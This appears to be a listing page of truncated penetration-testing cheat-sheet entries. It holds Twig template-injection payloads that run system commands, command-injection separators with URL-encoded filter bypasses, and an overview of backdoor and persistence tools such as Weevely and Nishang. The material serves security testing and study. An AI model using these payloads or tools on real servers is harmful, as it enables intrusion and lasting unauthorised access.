• Twig Template Engine

    Twig is a MVC-based tem­plate engine for PHP. Doc­u­men­ta­tion Out­put a value: {{ var }} Force a error, e.g. via a invalid operation: {{'a' * 5}} Con­cata­na­tion of strings: {{ 'a' ~ 'a' }} The reduce method take a func­tion and then para­me­ters… (It’s a PHP tem­plate engine, remember?) {{ [0]|reduce('system','whoami')}}{{ [0]|reduce('exec', 'whoami') }}{{ [0]|reduce('shell_exec', 'whoami') }}{{…

  • Command injections

    See also the encod­ing post for encod­ing methods. Tips Bypassing filters Linux / PHP All URL encod­ed val­ues start­ing with a space character. | id %20%7c%20%69%64 || id %20%7c%7c%20%69%64 & id %20%26%20%69%64 && id %20%26%26%20%69%64 <?php print "1"" ?> %20%3c%3f%70%68%70%20%70%72%69%6e%74%20%22%31%22%22%20%3f%3e ;id %20%3b%69%64 Sources

  • Maintain shell access

    Weevely https://tools.kali.org/maintaining-access/weevely Erzeugt PHP-Skript auf Serv­er, mit dem man eine Shell wieder bekom­men kann. Various scripts Shelter (win32) Dynam­ic shell injec­tion tool into nor­mal Win­dows binaries. https://tools.kali.org/maintaining-access/shellter Create own (normal) shell HTTPTunnel Needs PHP; cre­ates file on a serv­er which acts as SSH proxy. Nishang Col­lec­tion of Pow­er­Shell scripts for back­doors and more. Kali:/usr/share/nishang dns2tcp Cre­ates a TCP…